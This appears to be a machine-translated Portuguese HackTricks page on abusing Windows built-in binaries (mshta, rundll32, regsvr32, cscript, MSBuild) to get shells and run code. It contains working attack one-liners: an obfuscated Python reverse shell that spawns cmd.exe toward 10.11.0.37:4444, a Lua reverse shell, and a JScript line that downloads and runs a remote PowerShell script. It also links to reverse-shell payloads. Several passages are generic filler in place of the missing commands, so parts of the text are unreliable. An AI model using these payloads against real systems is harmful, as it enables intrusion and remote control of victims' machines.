* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows, assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para Linux.\
Obviamente, **não há arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (abusados) para realizar algum tipo de ação inesperada, como **executar código arbitrário**.
**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais tipo Unix e no Microsoft Win32. sbd apresenta criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha de porta de origem, reconexão contínua com atraso e algumas outras características interessantes. sbd suporta apenas comunicação TCP/IP. sbd.exe (parte da distribuição Kali linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser carregado em um computador com Windows como uma alternativa ao Netcat.
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
Perl é uma linguagem de programação interpretada, de propósito geral e de alto nível. É frequentemente usada em tarefas de administração de sistemas e desenvolvimento web. O Perl é conhecido por sua capacidade de processar texto e manipular arquivos de forma eficiente. Ele também possui uma grande variedade de módulos disponíveis para facilitar o desenvolvimento de aplicativos. O Perl é uma ferramenta útil para hackers, pois pode ser usado para escrever scripts de automação e realizar tarefas de penetração de rede.
Ruby é uma linguagem de programação dinâmica, orientada a objetos e de propósito geral. É frequentemente usada para desenvolvimento web e scripting. O Ruby é conhecido por sua sintaxe simples e elegante, o que torna a escrita de código mais fácil e agradável. Além disso, o Ruby tem uma grande comunidade de desenvolvedores que criam bibliotecas e frameworks para facilitar o desenvolvimento de aplicativos.
Lua é uma linguagem de programação leve, rápida e fácil de aprender. É frequentemente usada em jogos, aplicativos móveis e outras aplicações que exigem desempenho e flexibilidade. Lua é uma linguagem interpretada, o que significa que o código é executado diretamente, sem a necessidade de compilação prévia. Além disso, Lua é altamente extensível, permitindo que os usuários adicionem facilmente novas funcionalidades à linguagem.
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
Powershell é uma ferramenta de linha de comando e linguagem de script desenvolvida pela Microsoft para gerenciamento de sistemas Windows. É uma ferramenta poderosa para hackers, pois permite a execução de comandos e scripts de forma automatizada e eficiente.
### Executando scripts
Para executar um script Powershell, basta abrir o Powershell e digitar o caminho para o arquivo do script. Por exemplo:
```
C:\Users\Hacker\Documents\script.ps1
```
### Executando comandos
Para executar um comando Powershell, basta digitar o comando diretamente no prompt do Powershell. Por exemplo:
```
Get-Process
```
### Escalonamento de privilégios
O Powershell pode ser usado para escalonamento de privilégios em sistemas Windows. Por exemplo, se um usuário comum tiver acesso ao Powershell, ele pode usar o comando `Start-Process` para executar um programa com privilégios de administrador.
### Download e execução de arquivos
O Powershell pode ser usado para baixar e executar arquivos maliciosos em um sistema Windows. Por exemplo, o comando `Invoke-WebRequest` pode ser usado para baixar um arquivo da internet e o comando `Invoke-Expression` pode ser usado para executar o arquivo baixado.
### Bypass de antivírus
O Powershell pode ser usado para contornar a detecção de antivírus em sistemas Windows. Por exemplo, o comando `Invoke-Obfuscation` pode ser usado para ofuscar um script Powershell e torná-lo mais difícil de ser detectado pelo antivírus.
A técnica `mshta - sct` é uma técnica de execução de código malicioso que utiliza o utilitário `mshta.exe` do Windows para executar um arquivo `.sct` (Scriptlet Text) que contém código VBScript ou JScript malicioso. O arquivo `.sct` é baixado de um servidor remoto e executado localmente pelo `mshta.exe`. Essa técnica é útil para contornar as restrições de execução de scripts do Windows, pois o `mshta.exe` é um aplicativo confiável do Windows e não é bloqueado por padrão pelos softwares antivírus.
O arquivo `.sct` pode conter código malicioso que pode ser usado para executar comandos no sistema comprometido, baixar e executar arquivos adicionais, roubar informações do sistema e muito mais. É importante notar que essa técnica requer que o sistema comprometido tenha acesso à Internet para baixar o arquivo `.sct` do servidor remoto.
O `mshta` é um utilitário do Windows que permite a execução de arquivos HTML como aplicativos. O Metasploit tem um módulo que permite a execução de payloads em um arquivo HTML usando o `mshta`.
O Metasploit tem um módulo que permite executar um payload através do comando `rundll32`. O payload é executado através da chamada da função `DllMain` do DLL especificado. O módulo é chamado `exploit/windows/local/hijack_rundll`.
Para usar este módulo, primeiro é necessário gerar um payload com o Metasploit. Em seguida, é necessário carregar o payload em um servidor web e iniciar o servidor. Depois disso, é necessário configurar o módulo `exploit/windows/local/hijack_rundll` com o URL do servidor web e o nome do arquivo DLL que contém o payload.
O Koadic é um RAT (Remote Access Trojan) que pode ser executado usando o Rundll32. Isso significa que você pode executar o Koadic sem precisar de um arquivo executável separado.
Para fazer isso, você precisa criar um arquivo .dll que contenha o código do Koadic e, em seguida, usar o Rundll32 para executar esse arquivo. O comando para fazer isso é o seguinte:
O `<nome_do_arquivo.dll>` é o nome do arquivo .dll que você criou. O `<nome_da_função>` é o nome da função que você deseja executar dentro do arquivo .dll. E `<argumentos>` são quaisquer argumentos que você deseja passar para a função.
Por exemplo, se você criou um arquivo chamado `payload.dll` que contém o código do Koadic e deseja executar a função `main` com o argumento `192.168.1.100`, o comando seria o seguinte:
```
rundll32.exe payload.dll,main 192.168.1.100
```
Isso executará o Koadic e se conectará ao endereço IP `192.168.1.100`.
Regsvr32 é um utilitário do Windows que permite registrar e desregistrar bibliotecas de vínculo dinâmico (DLLs) e controles ActiveX no registro do sistema. Isso pode ser usado por um invasor para executar código malicioso em um sistema comprometido. O Regsvr32 pode ser usado para executar um arquivo .sct malicioso que pode ser usado para baixar e executar um payload malicioso.
O módulo `regsvr32` do Metasploit permite que um invasor execute um payload arbitrário através do registro do Windows. O payload é executado quando o `regsvr32` é executado com o caminho para uma DLL maliciosa. Este método é útil quando o invasor não tem permissões elevadas, mas pode registrar DLLs.
O `cscript` é um interpretador de comandos do Windows que permite a execução de scripts em VBScript e JScript. O Metasploit tem um módulo que permite a execução de comandos `cscript` em um shell remoto do Windows. Isso pode ser útil para executar scripts maliciosos em um alvo comprometido.
Para usar o módulo `cscript` do Metasploit, primeiro é necessário estabelecer uma sessão de shell remoto no alvo. Em seguida, o módulo pode ser carregado com o comando `use windows/manage/cscript` e as opções necessárias podem ser configuradas. Por exemplo, o caminho para o script a ser executado pode ser especificado com a opção `SCRIPTPATH`.
Uma vez que o módulo esteja configurado corretamente, o comando `run` pode ser usado para executar o script no alvo. O resultado da execução do script será exibido no console do Metasploit.
É importante lembrar que a execução de scripts maliciosos em um alvo comprometido pode ser ilegal e antiético. O uso do módulo `cscript` do Metasploit deve ser feito apenas para fins de teste em ambientes controlados e com autorização prévia.
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
Você pode usar essa técnica para contornar a lista de permissões de aplicativos e as restrições do Powershell.exe. Como você será solicitado com um shell PS.\
Basta baixar e executar isso: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
Você pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
Na pasta **Shells**, há muitas shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_, faça uma cópia do script e adicione ao final do arquivo:
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
